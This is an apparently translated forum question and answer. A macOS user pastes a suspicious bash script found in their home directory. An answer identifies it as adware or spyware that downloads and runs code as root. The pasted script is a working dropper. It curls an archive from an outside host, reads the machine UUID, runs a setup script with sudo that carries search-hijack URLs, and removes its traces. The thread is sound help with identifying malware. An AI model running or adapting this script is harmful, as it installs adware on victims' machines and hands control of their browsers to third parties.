Macos 在我的根目录上找到一个文件不确定它是什么？

我正在使用一个终端，在我的根目录中找到了这个名为“file”（bash）的代码文件。这个文件坏了吗，我不知道它在做什么，它把我吓坏了

func_4(){
/bin/mkdir -p /var/tmp
/usr/bin/curl -s -L -o /var/tmp/sr.tgz 
"http://c.onlinemacupdate.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, 
line, "\""); printf("%s\n", line[4]); }')

COUNTRY="US"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] 
|| [ "$COUNTRY" == "NZ" ]\
|| [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] 
|| [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
|| [ "$COUNTRY" == "DE" ]; then
sudo ./setup.sh "http://www.searchitdown.com/? 
n=006&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/? 
n=006&searchsource=69&UM=8&gd=SY1000653" 
"http://www.searchitdown.com/Results.aspx? 
n=006&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" 
"http://i.firstinstallmac.club/c/cc?id="
else
sudo ./setup.sh "http://feed.snowbitt.com/ 

publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp
&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/? 

publisher=TingSyn&ts=sy&barcodeid=51222999&
searchtype=nt&type=YHS_TGE_5a01fc&_=tt1" "http://feed.snowbitt.com/? 
publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&
type=TGE_5a01fc" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
/usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
f unc_taaVqst &

} 
func_4 &

---

这段代码在做什么？这不好吗？

删除它。如前所述，它是广告软件和间谍软件。

简而言之，它从网站下载内容并以root用户身份运行。我想它会安装后门并建立到服务器的控制通道。您应该尝试找出它是如何到达那里的（被利用了什么），然后在没有漏洞的情况下重新安装服务器。